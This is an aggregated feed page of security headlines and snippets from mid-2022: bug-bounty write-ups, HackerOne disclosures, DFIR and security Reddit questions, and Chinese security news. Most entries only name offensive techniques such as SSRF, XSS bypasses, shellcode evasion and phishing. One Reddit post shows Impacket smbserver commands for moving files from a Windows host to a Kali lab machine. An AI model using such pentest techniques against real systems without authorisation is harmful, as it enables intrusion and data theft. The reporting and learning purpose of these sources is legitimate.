    Red vs Blue Team Project
    Assessment, Analysis, and Hardening of a vulnerable system. This report includes a Red Team Security Assessment, a Blue Team Log Analysis… Continue reading on Medium »
    A Developer’s Nightmare: Story of a simple IDOR and some poor fixes worth $1125
    Hello Everyone, I hope you all are doing good. This is my second blog and in this will be covering a finding of a Simple IDOR followed by… Continue reading on Medium »
    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Dalam dunia pentesting ada sebuah standar yang digunakan sebagai acuan atau standar keamanan yang mungkin para pembaca sudah mengetahuinya… Continue reading on Medium »
    Why Did I Fail At Bug Bounties?
    Hello folks, Continue reading on Medium »
    Host Header injection to redirect in live website
    Hi this is my fifth blog and if you want to read my first blog(about xss bug) then click on this link: My First Bug Bounty. Continue reading on Medium »
    The 6 UGLY TRUTHS about Security Certifications
    Here we are again, with yet another (possibly) controversial topic. This time is about security certifications. Regardless if you are in… Continue reading on Medium »
  • Open

    CVE-2022-27781: CERTINFO never-ending busy-loop
    Internet Bug Bounty disclosed a bug submitted by sybr: https://hackerone.com/reports/1606039 - Bounty: $480
  • Open

    MFA validity through multiple IP addresses
    Hello, I got an alert saying that an O365 OWA account was being logged in from multiple IP addresses. On checking, I found that while the user was in India and had MFA enabled, the logins were happening through over 100 separate IP addresses in Nigeria. The user may have used Microsoft Authenticator to accidentally click yes to one of the logins. How do these attackers manage to keep sessions alive over multiple computers and over the period of a week? Is there a change that needs to be made in the O365 admin console to protect against this? Say ask for the password every 12 hours and the same for MFA. I am checking the audit logs and clearly the attacker read some of the users emails, but no harm that we can find yet. submitted by /u/indianadmin [link] [comments]
    Does anyone have any extra SANS practice tests available?
    Does anyone have any extra SANS practice tests (SANS 522) available? submitted by /u/herbertisthefuture [link] [comments]
  • Open

    Assets for geocities.restorativland.org (mostly screenshots)
    submitted by /u/ilikemacsalot [link] [comments]
    'alternative living' stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Fractals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Movies but what language are they?
    http://www.konectar1.com/yesi/ http://www.netfrg.com/mov/ submitted by /u/RainyAbrar [link] [comments]
    Movies
    Not sure about speed. Didn't go through it all, hence marking NSFW. http://jotokusi.com/ftp/ Not sure if already posted "site:reddit.com/r/opendirectories http://jotokusi.com/ftp/" -- turned up no result to me. submitted by /u/RainyAbrar [link] [comments]
  • Open

    The End of PPLdump
    submitted by /u/0xdea [link] [comments]
    Investigating a Hacked WordPress site on Linode. Step by step.
    submitted by /u/nykzhang [link] [comments]
  • Open

    SecWiki News 2022-07-24 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-24 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    History Repeats Itself
    It's said that those who do not study history are doomed to repeat it. I'd suggest that the adage should be extended to, "those who do not study history and learn from her lessons are doomed to repeat it." My engagement with technology began at an early age; in the early '80s, I was programming BASIC on a very early IBM-based PC, the Timex-Sinclair 1000, and Mac IIe. By the mid-'80s, I'd programmed in BASIC and Pascal on the TRS-80. However, it wasn't until I completed my initial military training in 1990 that I began providing technology as a service to others; I was a Communications Officer in the Marine Corps, providing trained technical Marines, servicing technical assets, in support of others. I had been taught about the technology...radios, phones, switchboards, etc...and troublesho…
  • Open

    How to Become an OSINT Master: Tips, Tricks, and Tools — Part 2
    Hey Folks! I hope you liked part -1 of my OSINT series. In this blog, we will discuss some excellent and professional techniques of… Continue reading on Medium »
    SPY NEWS: 2022 — Week 29
    Summary of the espionage-related news stories for the Week 29 (July 17–23) of 2022. Continue reading on Medium »
  • Open

    Red vs Blue Team Project
    Assessment, Analysis, and Hardening of a vulnerable system. This report includes a Red Team Security Assessment, a Blue Team Log Analysis… Continue reading on Medium »
  • Open

    谁动了我的DevOps:DevOps风险测绘
    DevOps市场规模在2021 年已超过70 亿美元,并有望在2022 年至2028 年间,以超过20% 的复合年增长率增长。
    攻击者在黑客论坛上推广新版本Redeemer 勒索软件
    威胁攻击者正在黑客论坛上推广新版本 Redeemer(救赎者)勒索软件构建器。
  • Open

    Pivoting Techniques with THM Wreath
    No content preview
  • Open

    Pivoting Techniques with THM Wreath
    No content preview
  • Open

    Pivoting Techniques with THM Wreath
    No content preview

  • Open

    Coursera Specializations - Are they worth it in Forensics/Cyber Incident Response?
    Hey all - general research. Are certification/specializations from Coursera (with capstone projects or practicals) worth it? I am currently studying for CompTIA Sec+ (10+ experience working in IT/incident responses) and working in an analyst role currently with security IT work incorporated, I'd like to get additional experience, particularly in Computer/Digital Forensics and upskill in my Cyber Response practices. I wanted to specialize in a niche, as a supplement to CompTIA Sec+ studies. - How are the following courses, would this be worth it (via the company InfoSec)? Cyber Incident Response Specialization Computer Forensics Specialization - Are there any solid books I could purchase that cover concepts for Computer/Digital Forensics and Cyber Incident Response? For example, I was checking out this book as a starting point: Digital Forensics and Incident Response Thank you for any advice in advance. submitted by /u/sora1493 [link] [comments]
    Remote work question
    Hi, i'm currently looking at getting into this field, and I wanted to ask, what are the chances of me, a european, getting a fully remote IR job in the U.S? Will employers greatly prefer a candidate based in the U.S even if the job can be done fully remote? As a foreigner I don't qualify for security clearance, would this be a big barrier in getting a job? Thank you in advance. submitted by /u/Frederic_-104 [link] [comments]
    Extracting all images and videos from Autopsy using python
    Hi, I have a quick question concerning writing something in python to extract all images and videos from Autopsy? I am halfway through the code to filter files to the newly created folders depending on the file extensions but currently this only picks up files from a folder not directly from Autopsy. Is it even possible to link it? and two if it is possible how would I go about linking it? If you need any more information please ask, I am only building this as the last three projects I've worked on have all been over 80,000 files and easier to filter out the useless files when they have been assigned to a folder. Thanks submitted by /u/sudo_oth [link] [comments]
  • Open

    Help understanding computer vulnerability to malware and hacks
    ​ OS: Windows 11 Hi all, I am a bit of a hypochondriac but with viruses etc always thinking I'm going to get hacked or I already am and someone has control over my pc. So I want to ask the following: Are drive by downloads, i.e. unintended dangerous file downloads when I visit a dodgy website and popups come up and tabs open and/or close possible on Google Chrome? If so how can I find out if my computer is infested? Is it possible for a virus or malicious files or software to attach itself to personal files on my pc or can I safely move my personal files to an external drive and format my pc? Does a windows full scan detect the above mentioned? Thanks a lot for any help! submitted by /u/lassolass [link] [comments]
    how can a hacker enter to your pics to then use them to blackmail you?
    Knew from someone who was blackmailed with some di*k pics, and wonder how to avoid this kind of situation submitted by /u/MoteCnHuesillo [link] [comments]
    Trying to help a friend who has a Deadbolt issue. No idea what I'm doing!
    So a friend of mine has their own business and they tried to attach a picture to an email and they noticed that rather than .jpeg, it read .deadbolt (I think). I've looked it up and it just says to update the firmware but they will still need to pay the ransom to get any encrypted files back. I just wondered if anyone knows anything about this and if they can tell me if what I've read is right or if anyone has any further ideas or suggestions? submitted by /u/Silver020 [link] [comments]
  • Open

    Twitter Vulnerability Exposes Data from 5.4M Accounts
    Article URL: https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/ Comments URL: https://news.ycombinator.com/item?id=32208204 Points: 1 # Comments: 0
    Verified Twitter Vulnerability Exposes Data from 5.4M Accounts
    Article URL: https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/ Comments URL: https://news.ycombinator.com/item?id=32201333 Points: 4 # Comments: 0
  • Open

    Transferring files from windows to kali using Impacket smbserver.py doesn't work?
    Transferring files from kali to windows is easy with something like python http.server. What about transferring files from windows to kali? I found very useful blog post here and attempted to do similar thing with Impacket smbserver.py https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb Setup Kali: 172.16.1.10 Windows: 172.16.1.50 Run smbserver on Kali with Impacket smbserver.py └─$ /usr/share/doc/python3-impacket/examples/smbserver.py share /tmp Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Config file parsed However, whenever I try on Windows, I'm getting "System error 53 has occurred, The network path was not found" as follows: C:\>net view \\172.16.1.10\ System error 53 has occurred. The network path was not found. Here is the message on Impacket smbserver.py [*] Incoming connection (172.16.1.50,56201) [*] Closing down connection (172.16.1.50,56201) [*] Remaining connections [] Then, I tried again with \share, but still getting the same error C:\>net view \\172.16.1.10\share System error 53 has occurred. The network path was not found. What's wrong and what should I do to make this right? submitted by /u/w0lfcat [link] [comments]
  • Open

    GUIDE: Debunking disinformation about tanks forming a bank barricade in China.
    Open source investigation often can be used as a weapon to fight disinformation that is spread on social-media. One of them that stood out… Continue reading on Medium »
    TryHackMe | Sakura Room
    TryHackMe’s Sakura Room. From finding an image left by an attacker to finding their town. Continue reading on Medium »
  • Open

    SecWiki News 2022-07-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Bug Bounty: Hunting Open Redirect Vulnerabilities For $$$
    This article was originally published at BePractical Continue reading on Medium »
    Un3xpected DoS Attack on Profile Pictur3
    Hey Everyone, Hope y’all doing gr3at and aw3some! Continue reading on InfoSec Write-ups »
    My Bug Bounty Resources
    Hello Amazing People, Continue reading on System Weakness »
    $$$ bounty in less 3 minutes from a google dork
    ~ Hi Bug Bounty Hunters & CyberSecurity folks!!! It’s been long since i dropped a bug bounty writeup. Continue reading on Medium »
    CyberTalents BootCamp 2022 #fisher
    ~ Steiner254 says … Congratulations!!! For making it to CyberTalents BootCamp 2022. Good Luck in your journey :) Continue reading on Medium »
    YACHTINGVERSE STAKING TESTNET CAMPAIGN (QUICK GUIDE)
    YachtingVerse is an open-world marine theme massive multi-users platform built on the BNB Beacon Chain. This platform will bring together… Continue reading on Medium »
    SecStory: How I Found Multiple P1 Vulnerabilities without Recon
    Hi folks.. Nowadays there are so many bug hunting story over there on internet, but for me I named this as my “SecStory” it stands for… Continue reading on Medium »
    Meow Starting Point HackTheBox Walkthrough
    Meow is a very good Challenge by HackTheBox for starting to practice Hacking skillls. So without any delays let’s get into it. Continue reading on Medium »
  • Open

    Un3xpected DoS Attack on Profile Pictur3
    No content preview
    I mean, IDOR is NOT only about others ID
    No content preview
    How to NOT keep your Active Directory safe.
    No content preview
    This one trick will exploit URL parsers to perform SSRF
    No content preview
    This is why you should NEVER use the eval() function — RCE!
    No content preview
    Be Careful of User Input. You will get hacked.
    No content preview
    Beware of Ghosts!! — when CVE-2018–16509 leads to Remote Code Execution.
    No content preview
  • Open

    Un3xpected DoS Attack on Profile Pictur3
    No content preview
    I mean, IDOR is NOT only about others ID
    No content preview
    How to NOT keep your Active Directory safe.
    No content preview
    This one trick will exploit URL parsers to perform SSRF
    No content preview
    This is why you should NEVER use the eval() function — RCE!
    No content preview
    Be Careful of User Input. You will get hacked.
    No content preview
    Beware of Ghosts!! — when CVE-2018–16509 leads to Remote Code Execution.
    No content preview
  • Open

    Un3xpected DoS Attack on Profile Pictur3
    No content preview
    I mean, IDOR is NOT only about others ID
    No content preview
    How to NOT keep your Active Directory safe.
    No content preview
    This one trick will exploit URL parsers to perform SSRF
    No content preview
    This is why you should NEVER use the eval() function — RCE!
    No content preview
    Be Careful of User Input. You will get hacked.
    No content preview
    Beware of Ghosts!! — when CVE-2018–16509 leads to Remote Code Execution.
    No content preview
  • Open

    Turning Open Reporting Into Detections
    I saw this tweet from Ankit recently, and as soon as I read through it, I thought I was watching "The Matrix" again. Instead of seeing the "blonde, brunette, redhead" that Cypher saw, I was seeing actionable detection opportunities and pivot points. How you choose to use them...detections in EDR telemetry or from a SIEM, threat hunts, or specifically flagging/alerting on entries in DFIR parsing...is up to you, but there are some interesting...and again, actionable...opportunities, nonetheless. From the tweet itself... %Draft% is environment variable leading to PowerShell Environment variables are good...because someone has to set that variable using...wait for it...w  a  i  t   f  o  r    i  t...the 'set' command. This means that if the variable is set via the command line, the process …
  • Open

    [doc.rt.informaticacloud.com] Reflected XSS via Stack Strace
    Informatica disclosed a bug submitted by bigbear_: https://hackerone.com/reports/232320
    [doc.rt.informaticacloud.com] Arbitrary File Reading via Double URL Encode
    Informatica disclosed a bug submitted by bigbear_: https://hackerone.com/reports/232371
    reflected XSS on panther.com
    Panther Labs disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1601140 - Bounty: $250
    Rack CVE-2022-30122: Denial of Service Vulnerability in Rack Multipart Parsing
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1627159 - Bounty: $2400
  • Open

    Siber Güvenlikte Kariyer
    Siber Güvenlikte Kariyer Continue reading on Bilişim Hareketi »
  • Open

    Jonathan's fun stuff
    http://users.ninja.org.uk/~jonathan/funstuff/ submitted by /u/RainyAbrar [link] [comments]

  • Open

    IDOR in report download functionality on ads.tiktok.com
    TikTok disclosed a bug submitted by f_m: https://hackerone.com/reports/1559739 - Bounty: $500
    CVE-2022-32214 - HTTP Request Smuggling Due To Improper Delimiting of Header Fields
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630669 - Bounty: $1800
    CVE-2022-32213 - HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630668 - Bounty: $1800
    CVE-2022-32215 - HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630667 - Bounty: $1800
  • Open

    Vex: Permanently Silence False Positives with Vulnerability EXchange
    Article URL: https://www.lunasec.io/docs/blog/vex-silence-false-positives/ Comments URL: https://news.ycombinator.com/item?id=32198211 Points: 1 # Comments: 0
    Major Security Vulnerability on PrestaShop Websites
    Article URL: https://build.prestashop.com/news/major-security-vulnerability-on-prestashop-websites/ Comments URL: https://news.ycombinator.com/item?id=32196961 Points: 2 # Comments: 1
  • Open

    Sector035’s 2020 OSINT Quiz
    I’m an OSINT newbie, but have been looking for challenges to practice a few of the skills I‘ve developed, and I came across this 18… Continue reading on Medium »
    OSINT: Vulnerable Webcam using SHODAN
    Shodan is one of the most popular and dangerous search engine which gives you all information from the banners and pulls from web-enabled… Continue reading on Medium »
    TryHackMe | Searchlight — IMINT Writeup
    TryHackMe’s Searchlight - IMINT room is an easy image-related OSINT room. We are tasked with analyzing images and finding information… Continue reading on Medium »
    War in Ukraine / July 21
    Day 149: The situation at the front has been stabilized. Helped by HIMARS Continue reading on Medium »
    #SwissArms: how to identify Sig Sauer assault rifles with Saudi forces in Yemen’s war
    Preamble Continue reading on Medium »
    Mengungkap Siapa Dibalik SPM55
    SPM55 adalah threat actor dari Indonesia yang menjual phishing atau scampage. Sebenarnya sudah pernah dibahas di thread Twitter tanggal 31… Continue reading on Medium »
  • Open

    New to DFIR. Unable to mount drives in Paladin.
    submitted by /u/Tristanrodz [link] [comments]
    New forensic file format
    Hello all, a while ago I started to design and build a PoC regarding an increase in read/write performance with a new forensic file format. The PoC resulted in the specification of a first than a second improved version of a new file format for forensic images "zff" - as an alternative to the meanwhile quite outdated EWF, AFF, ... formats. Zff has the potential (depending on the input data) to provide significant speed increase (see benchmarks at https://github.com/ph0llux/zff). Furthermore, zff offers a massively expanded feature set: physical and logical dumps multiple dumps (both logical and physical) in one container keeping related evidence together extension of existing containers (with both logical and physical dumps) hashing algorithms used for integrity purposes considered most secure, fast and modern at the moment optional data encryption (even partially, if desired) (for security purposes). optional digital signature of stored data (for authenticity purposes; using a public-private key method). great flexibility when adding descriptions to cases and much more The documentation of the file format can be found at https://zff.dev (website is work in progress). I've written also a reference implementation to create, analyze and handle files in zff format. The library is written in Rust and can be found at https://github.com/ph0llux/zff. You can try it out yourself using the tools zffacquire, zffmount and zffanalyze (see the github link). We've tested the tools ourselves, but if you find any errors in the reference library, please open a github issue. submitted by /u/ph0llux [link] [comments]
    Windows honeypots for forensic analysis
    Hi All, Has anyone here used Windows virtual machines or devices as a honeypot(s) to capture malicious activity and artifacts? I'm interested in gathering logs, pcaps, memory and images much like the content published by the dfir report. I'm curious to hear what risks and challenges were faced, as well as what lessons were learnt. Cheers submitted by /u/netw0rknovice [link] [comments]
    Using cloud storage as a forensic collection platform
    Hi CF! I'm engaging with a client who wishes to obtain a number of documents from ~50 different sources. They are cost conscious, and are considering whether they can setup a platform and enable the sources to put files there - including relevant file hashes etc. These sources would be the complaintant, in this case - and the client would be the lawyer. I'm inclined to go with good old fashioned physical collection using write-blockers et al - but always conscious I might be missing something. Any thoughts on wise people? submitted by /u/smartypantz_ [link] [comments]
  • Open

    Interesting blogs/books about cyber security in large scale and complex infrastructures
    I work for a company that is particularly disorganized, due to a long series of mergers. The whole infrastructure is fragmented, rendering even simple security operations very hard and long to complete. Working in this environment is frustrating, but the worst part is that, with my experience, I really don't have any clue on how to handle such level of complexity. I would like to read some inspiring article that explains how big infrastructures - like in FAANG-like companies - are secured against cyber attacks. Do you know any interesting blog for this purpose? Or books? submitted by /u/subseven93 [link] [comments]
    Need recommendation for studying ISO 27005
    Could you please recommend best studying material for ISO 27005? submitted by /u/OmegaMan-PT [link] [comments]
    Practical uses of MITRE ATT&CK MATRIX
    What are the practical applications of the matrix? The only one I know of and have seen is to use it to identify whether within one's perimeter one can identify and block any TTPs, but is that the only practical application? What are some other uses? Thanks submitted by /u/woodpmirror [link] [comments]
  • Open

    Defeating Javascript Obfuscation
    submitted by /u/baryoing [link] [comments]
    Confuser - New Dependency Confusion Detection Tool
    submitted by /u/nibblesec [link] [comments]
    A repository of Windows persistence mechanisms
    submitted by /u/CyberMasterV [link] [comments]
    North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    PART 1: How I Met Your Beacon - Overview
    submitted by /u/gid0rah [link] [comments]
  • Open

    I mean, IDOR is NOT only about others ID
    Hi folks! In this write-up, I’m going to talk about the vulnerability I found to broaden your perspective on IDORs. Continue reading on InfoSec Write-ups »
    How I was able to Take over a support chat using leaked Keys
    Hello Everyone.  First, let me introduce myself. I’m Pliskin ( from MGS x) ), I’m an associate systems engineer, CTF player and I do some… Continue reading on Medium »
    Welcome to Hats, Idle Finance.
    Another great team joins the Hats Finance Bounty Program! Welcome Idle Finance, excited to have you onboard. Continue reading on Medium »
    Slavi Announced Bug Bounty Program
    Hello everyone! We are excited to run a global bounty campaign to test our brand-new Slavi Wallet and bring the revolutionary blockchain… Continue reading on Medium »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    Entropy is the measure of the randomness in a set of data (here: shellcode). The higher the entropy, the more random the data is. Continue reading on InfoSec Write-ups »
    Balancer DoS Bugfix Review
    On May 14th, ChainSecurity employee @k_besic reported a vulnerability classified as “Medium” in Balancer protocol. The vulnerability… Continue reading on Immunefi »
    Bug Bounty
    In 2021 hackers made off with $14 Billion in cryptocurrency, double the 2020 figures of $7 billion. 2022 will be no different. DeFi… Continue reading on Medium »
  • Open

    North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    PART 1: How I Met Your Beacon - Overview - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Show HN: Open API and GraphQL Fuzzing via GitHub Actions
    Schemathesis is a specification-centric API fuzzing tool for Open API and GraphQL-based applications. I've been building Schemathesis GitHub app for a while and now it is ready to use. You run it as a part of your workflow, then it comes to PRs and adds little reports about API fuzzing results. Folks, I'd appreciate your feedback about the tool or its GitHub integration :) Comments URL: https://news.ycombinator.com/item?id=32193967 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-07-22 Review
    CVE-2019-0808 by SecIN社区 如何通过GPS追踪器关闭汽车引擎 by ourren 可视化全链路日志追踪 by ourren 代码表征预训练语言模型学习指南:原理、分析和代码 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-22 Review
    CVE-2019-0808 by SecIN社区 如何通过GPS追踪器关闭汽车引擎 by ourren 可视化全链路日志追踪 by ourren 代码表征预训练语言模型学习指南:原理、分析和代码 by ourren 更多最新文章,请访问SecWiki
  • Open

    How Malicious Hackers Can Takeover Your Headless Browser: Part 1
    No content preview
    How Malicious Hackers Can Takeover Your Headless Browser: Part 2
    No content preview
    Don’t let evil hackers abuse this simple Flask/Jinja2 mistake
    No content preview
    Let’s Understand Path Traversal Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    No content preview
    A Lab for Practicing Azure Service Principal Abuse
    No content preview
    TryHackMe — Antivirus
    No content preview
  • Open

    How Malicious Hackers Can Takeover Your Headless Browser: Part 1
    No content preview
    How Malicious Hackers Can Takeover Your Headless Browser: Part 2
    No content preview
    Don’t let evil hackers abuse this simple Flask/Jinja2 mistake
    No content preview
    Let’s Understand Path Traversal Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    No content preview
    A Lab for Practicing Azure Service Principal Abuse
    No content preview
    TryHackMe — Antivirus
    No content preview
  • Open

    How Malicious Hackers Can Takeover Your Headless Browser: Part 1
    No content preview
    How Malicious Hackers Can Takeover Your Headless Browser: Part 2
    No content preview
    Don’t let evil hackers abuse this simple Flask/Jinja2 mistake
    No content preview
    Let’s Understand Path Traversal Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    No content preview
    A Lab for Practicing Azure Service Principal Abuse
    No content preview
    TryHackMe — Antivirus
    No content preview
  • Open

    The more predictable you are, the less you get detected — hiding malicious shellcodes via Shannon…
    Entropy is the measure of the randomness in a set of data (here: shellcode). The higher the entropy, the more random the data is. Continue reading on InfoSec Write-ups »
    MSA #1 How to Generate & Installing Burpsuite Certificate to Nox Emulator
    What needs to be prepared : Continue reading on Medium »
    A Lab for Practicing Azure Service Principal Abuse
    Introduction Continue reading on InfoSec Write-ups »
    Siber Güvenlikte Mavi Takım Üyesi Olmak
    Siber Güvenlikte Mavi Takım Üyesi Olmak Continue reading on Bilişim Hareketi »
  • Open

    《关于开展网络安全服务认证工作的实施意见(征求意见稿)》发布
    认证规则和认证标志由市场监管总局征求中央网信办、公安部意见后另行制定发布。
    FreeBuf早报 | 威胁者使用GoMet攻击乌克兰;Conti入侵并加密哥斯达黎加政府
    Conti入侵并加密哥斯达黎加政府。
    FreeBuf周报 | 万代南梦宫证实遭黑客入侵;阿尔巴尼亚政府遭受“大规模网络攻击”
    各位 FreeBufer 周末好~以下是本周的「FreeBuf 周报」!
    企业应缩小攻防差距 | 《2022企业攻击面管理》报告解读
    Hackerone发布了《2022年企业攻击面管理》报告。
    系统日志的安全管理与审计 | FreeBuf甲方群话题讨论
    系统日志在攻击中被清掉了该怎么恢复?日志管理这一块平时应该怎么做?对其审计做起来是不是比较麻烦?
    Atlassian修复了一个关键的Confluence漏洞
    Atlassian发布了安全更新。
    Microsoft Teams 故障导致 Microsoft 365 服务中断
    近日的一个Microsoft Teams小故障,却使得多个与Teams整合的Microsoft 365服务瘫痪。
    Operation(호랑이머리깃발)ShadowTiger:盘踞在佛岩山上的过林之虎
    2019年奇安信威胁情报中心发布《阻击“幻影”行动:奇安信斩断东北亚APT组织“虎木槿”伸向国内重要机构的魔爪》。
    谷歌把全球最大的计算机协会 (ACM)给封了
    Google 搜索和云端硬盘错误地将全球最大的计算机协会 (ACM) 研究论文和网站的链接标记为恶意软件。
    SQL 注入之 Getshell 实战学习
    SQL 注入之 Getshell 的实战学习,一起来上手试一试吧 !
  • Open

    CAD files for a free energy, perpetual motion machine
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Mirrors
    https://mirrors.dtops.cc submitted by /u/ilikemacsalot [link] [comments]
    all the insurance application forms you could ever want
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    CVE Trends – Crowdsourced CVE Intel
    Article URL: https://cvetrends.com/ Comments URL: https://news.ycombinator.com/item?id=32187798 Points: 2 # Comments: 0

  • Open

    Sh*Load exploits: SHA Hardware Offload w/o Error Checking
    submitted by /u/Unique-Enthusiasm-54 [link] [comments]
    Gitlab Project Import RCE Analysis (CVE-2022-2185)
    submitted by /u/CyberMasterV [link] [comments]
    The Return of Candiru: Zero-days in the Middle East
    submitted by /u/stashing_the_smack [link] [comments]
    GitHub - TheOfficialFloW/bd-jb: The first bd-j hack.
    submitted by /u/jeandrew [link] [comments]
    Django web applications with enabled Debug Mode, DB accounts information and API Keys of more than 3,100 applications were exposed on internet.
    submitted by /u/zwrinerlucas [link] [comments]
  • Open

    Would like to learn about malware and how it is implemented
    I'm just about completely new to hacking/cybersecurity- related affairs and would like to learn about malware, mainly Trojan horses and specifically those that plant cryptocurrency miners or perhaps ransomware. How do these work, where can they be found, how are they implemented and is it legal to possess them? If possible, please explain in simple terms. P.S.: I feel like I should add that this is just for fun and to satisfy my curiosity, not for malicious or criminal reasons Thank you for your help! submitted by /u/Antique__throwaway [link] [comments]
    Is /Browser a legitimate named pipe, and if so, what does it do?
    I see SMB named pipes called “Browser” in traffic, but I can’t find any documentation on it. There’s a lot of Metasploitable and Confickr related articles about it, but nothing I can find with legitimate uses. \Browser* submitted by /u/Free-Roaming-Orange [link] [comments]
    System information in the URL?
    SIEM tool flagged warning for the website and the URL was like this. The retracted part looked like a hash. Is there a legitimate use case where such data is passed in the URL? "http://randomwebsite.com/update?os=win&arch=x86&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=103.0.5060.114&lang=hu&acceptformat=crx3&x=%3D1.0.5690.34919%26installsource%3Dnotfromwebstore%26installedby%3Dinternal%26uc" submitted by /u/sec_admin [link] [comments]
  • Open

    Unrecognized file system on FTK imager
    Hoping to get some help here as I am new to computer forensics. I’m trying to analyze a .raw memory capture that is 5 gb on ftk but it is showing “unrecognized file system” when trying to view the contents. submitted by /u/1rangusN1dangus [link] [comments]
  • Open

    fix(cmd-socketio-server): mitigate cross site scripting attack #2068
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1638984 - Bounty: $100
  • Open

    What is a red team?
    The red team refers to highly-expert security professionals who can break into defenses and attack systems. Red teams are independent… Continue reading on Medium »
    GSuite red teaming — Phishing using Google Groups
    As part of a red team operation, I was recently researching on how to perform phishing where the target company uses Google Suite instead… Continue reading on System Weakness »
    GSuite red teaming — Phishing using Google Groups
    As part of a red team operation, I was recently researching on how to perform phishing where the target company uses Google Suite instead… Continue reading on Medium »
  • Open

    Ultimate Tips And Tricks To Find More Cross-Site Scripting Vulnerabilities
    @bxmbn Continue reading on Medium »
    Reflected Cross Site Scripting (AkamaiGhost) Bypass
    Disclaimer Continue reading on Medium »
    How I Test For Web Cache Vulnerabilities + Tips And Tricks
    @bxmbn Continue reading on Medium »
    Installing Kali Linux as Portable Live USB for Pentesting.
    Hello Amazing People, Continue reading on Medium »
    Android App Pentest #1 Setup Certificate Burpsuite ke Emulator Android
    Burpsuite adalah tool yang sangat sering di gunakan untuk melakukan Penetration Test / Bug bounty. Burpsuite digunakan sebagai penengah… Continue reading on Medium »
    HackerOne CTF: Postbook
    I recently published an article on a CTF writeup, an introduction to the HackerOne CTF. You can find that article here. Today I am… Continue reading on Medium »
  • Open

    Reflected Cross Site Scripting (AkamaiGhost) Bypass
    Disclaimer Continue reading on Medium »
  • Open

    War in Ukraine / July 20
    Day 148: The logistical “nightmare” of supplying the Ukrainian army Continue reading on Medium »
  • Open

    CVE-2022-23131_Zabbix登录绕过漏洞复现
    CVE-2022-23131漏洞复现
    CCSIP 2022中国网络安全产业全景图(第四版)正式发布 | FreeBuf咨询
    2022年7月21日,国内安全行业门户FreeBuf旗下FreeBuf咨询正式发布《CCSIP 2022中国网络安全产业全景图》(第四版)。
    FreeBuf早报 | 微软冻结安全部门招聘计划;二季度勒索软件受害者环比下降34%
    微软正在取消许多空缺职位招聘,包括其 Azure云业务和安全软件部门。微软确认,近期内招聘冻结将继续。
    物联网终端安全入门与实践之玩转物联网固件(中)
    本篇将系统性介绍终端设备固件仿真的概念、技术、工具和框架,以及手动固件仿真的过程和技巧。
    邮件钓鱼演练指南
    无论是在攻防对抗中,还是面对APT威胁中,企业员⼯安全意识成为影响企业安全隐患的重灾区。
    多款Play Store应用程序分发恶意软件
    The Hacker News 网站披露,Google 已从官方 Play 商店中下架了部分欺诈性应用程序。
    卡巴斯基发出警告,勒索软件Luna来袭
    Luna可加密运行多个操作系统的设备,包括 Windows、Linux 和 ESXi 等主流操作系统。
    国家网信办出手,滴滴被罚80.26亿元
    国家互联网信息办公室依法对滴滴全球股份有限公司处人民币80.26亿元罚款。
    思科修复了允许攻击者以root身份执行命令的BUG
    思科解决了Cisco Nexus Dashboard数据中心管理解决方案中的严重漏洞。
    Gartner安全运营Hype Cycle发布,登顶的XDR未来在何方?
    此次XDR登顶并未让众人对“XDR将成为未来安全运营的关键技术”的观点趋于一致,反而进一步激化了彼此之间的分歧。
    Neopets遭遇数据泄露,源代码与数据库被盗
    虚拟宠物网站Neopets遭遇数据泄露,导致源代码以及包含6900多万会员个人信息的数据库被盗。
    WIKI知识大陆@你开启共建奇旅,「接受」or「同意」?
    「WIKI知识大陆」共建列车已到站,静待你,检票上车!
    诈骗者正利用虚假的YouTube谷歌搜索结果行骗
    网络安全公司 Malwarebytes批露了利用虚假Youtube谷歌广告搜索结果进行的诈骗行为。
  • Open

    SecWiki News 2022-07-21 Review
    浅析JNDI注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-21 Review
    浅析JNDI注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Tag Blending Obfuscation In Property-Based Payloads
